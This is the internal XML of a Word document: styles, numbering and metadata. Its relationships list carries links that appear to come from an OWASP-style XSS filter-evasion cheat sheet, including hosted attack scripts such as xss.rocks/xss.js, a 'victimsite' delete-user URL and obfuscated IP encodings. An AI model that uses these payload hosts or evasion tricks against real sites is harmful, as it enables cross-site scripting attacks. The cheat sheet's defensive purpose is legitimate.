    <w:lvl w:ilvl="4" w:tplc="69DEE92E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4507" w:hanging="1217"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="1D967C98">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5259" w:hanging="1217"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="381287A0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6011" w:hanging="1217"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7772DC06">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6762" w:hanging="1217"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="827079B2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7514" w:hanging="121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743"/>
    <w:rsid w:val="00AC7743"/>
    <w:rsid w:val="00EF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28854E9-4815-440A-B8B5-E0EEC00C0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Balk1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:left="154"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto Lt" w:eastAsia="Roboto Lt" w:hAnsi="Roboto Lt" w:cs="Roboto Lt"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Balk2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="102"/>
      <w:ind w:left="154"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Balk3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="182" w:lineRule="exact"/>
      <w:ind w:left="288"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Balk4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="101"/>
      <w:ind w:left="154"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="16"/>
      <w:szCs w:val="1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16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="KonuBal">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="214"/>
      <w:ind w:left="154"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto Lt" w:eastAsia="Roboto Lt" w:hAnsi="Roboto Lt" w:cs="Roboto Lt"/>
      <w:sz w:val="33"/>
      <w:szCs w:val="33"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListeParagraf">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="148"/>
      <w:ind w:left="420" w:hanging="23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xss.rocks/xss.js" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.css" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/scriptlet.html" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.js" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xssmoz.xml" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ha.ckers.org/xss.swf" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.js" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://victimsite.com/admin.asp%26deleteuser" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://0102.0146.0007.00000223/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com./" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-project-cheat-sheets/" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ha.ckers.org@google/" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/%27)" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.js" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.css%27%3B" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/garethheyes/status/997466212190781445" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://help.dottoro.com/" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.css" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/scriptlet.html" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.jpg" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://1113982867/" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://google.com/" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/%27" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ha.ckers.org/xss.html" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://0x42.0x0000066.0x7.0x93/" TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/ogle.com/" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.js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xss.rocks/scriptlet.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.css" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.css" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xssmoz.xml" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ha.ckers.org/xss.swf" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://66.102.7.147/" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com./" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.js" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://victimsite.com/admin.asp%26deleteuser" TargetMode="External"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www/" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/%27)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://xss.rocks/xss.js" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://help.dottoro.com/ljfvvdnm.php" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.css" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.js" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://1113982867/" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.js" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ha.ckers.org/xss.swf~~" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://0102.0146.0007.00000223/" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ha.ckers.org@google/" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://google.com/" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/ogle.com/" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20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heatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html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://xss.rocks/scriptlet.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.css%27%3B" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ha.ckers.org/xsscalc.html" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://66.102.7.147/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/garethheyes" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.css" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xss.rocks/xss.jpg" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://0x42.0x0000066.0x7.0x93/" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www/" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/%27" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com/" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/clickjack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xss.rocks/xss.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5710</Words>
  <Characters>32547</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>271</Lines>
  <Paragraphs>76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tburakdirlik</dc:creator>
  <cp:lastModifiedBy>Lenovo</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-15T03:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-15T03:33:00Z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2022-07-06T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2022-07-15T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>